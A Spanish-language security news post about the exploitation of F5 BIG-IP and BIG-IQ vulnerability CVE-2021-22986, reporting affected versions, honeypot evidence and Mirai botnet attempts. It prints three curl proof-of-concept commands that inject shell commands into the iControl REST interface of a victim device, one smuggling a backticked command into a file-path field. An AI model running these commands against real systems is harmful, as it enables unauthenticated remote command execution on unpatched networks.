22 mar. 2021

Exploits para la vulnerabilidad crítica de F5 BIG-IP y BIG-IQ (CVE-2021-22986)

Casi 10 días después de que la empresa F5 Networks lanzara parches para vulnerabilidades críticas en sus productos BIG-IP y BIG-IQ, los adversarios comenzaron a escanear en de forma masiva, apuntando a este tipo de dispositivos de red expuestos y sin parches para ingresar a las redes empresariales.

La noticia de la explotación In-the-Wild llega inmediatamente después de la aparición de varias PoC y códigos publicados. La explotación se habría logrado a principios de semanas y mediante la ingeniería inversa del parche de software Java en BIG-IP. 

PoC #1

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

PoC #2

curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'

PoC #3

curl -ksu admin:[pass] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'

Las fallas afectan las versiones 11.6 o 12.xy más recientes de BIG-IP, con una ejecución de código remoto crítico (CVE-2021-22986) que también afecta las versiones 6.xy 7.x de BIG-IQ.

CVE-2021-22986 (puntuación CVSS: 9,8) destaca por el hecho de que se trata de una vulnerabilidad de ejecución remota de comandos no autenticada (RCE completo) que afecta a la interfaz REST de iControl, lo que permite a un atacante ejecutar comandos arbitrarios del sistema, crear o eliminar archivos y deshabilitar servicios sin el necesidad de cualquier autenticación.

La explotación exitosa de estas vulnerabilidades podría conducir a un compromiso total de los sistemas susceptibles, incluida la posibilidad de ejecución remota de código, así como desencadenar un desbordamiento del búfer, lo que provocaría un ataque de denegación de servicio (DoS).

Si bien F5 dijo que no estaba al tanto de ninguna explotación pública de estos problemas el 10 de marzo, los investigadores del Grupo NCC dijeron que ahora han encontrado evidencia de "explotación de cadena completa de las vulnerabilidades de F5 BIG-IP / BIG-IQ iControl REST API CVE-2021 -22986, a raíz de múltiples intentos de explotación contra su infraestructura honeypot".

Además, el equipo de inteligencia de amenazas de la Unidad 42 de Palo Alto Networks dijo que encontró intentos de explotar CVE-2021-22986 para instalar una variante de la botnet Mirai. Pero no está claro si esos ataques tuvieron éxito.

Dada la popularidad de BIG-IP / BIG-IQ en las redes corporativas y gubernamentales, no debería sorprender que esta sea la segunda vez en un año que los dispositivos F5 se han convertido en un objetivo lucrativo para la explotación.

En julio pasado, la compañía abordó una falla crítica similar (CVE-2020-5902), luego de la cual fue abusada por grupos de atacantes informáticos patrocinados por el estado iraní y chino, lo que llevó a la Agencia de Seguridad de Infraestructura y Ciberseguridad de los EE.UU. (CISA) a emitir una alerta advirtiendo sobre una "amplia actividad de escaneo para la presencia de esta vulnerabilidad en todos los departamentos y agencias federales".

"La conclusión es que [las fallas] afectan a todos los clientes e instancias de BIG-IP y BIG-IQ; instamos a todos los clientes a actualizar sus implementaciones de BIG-IP y BIG-IQ a las versiones fijas lo antes posible", dijo el Kara Sprague de F5 la semana pasada.

Ya se pueden descargar los IOCs, reglas de Yarareglas de Suricata para la detección de CVE-2021-22986.

Fuente: THN

Suscríbete a nuestro Boletín

0 Comments:

Publicar un comentario

Gracias por dejar un comentario en Segu-Info.

Gracias por comentar!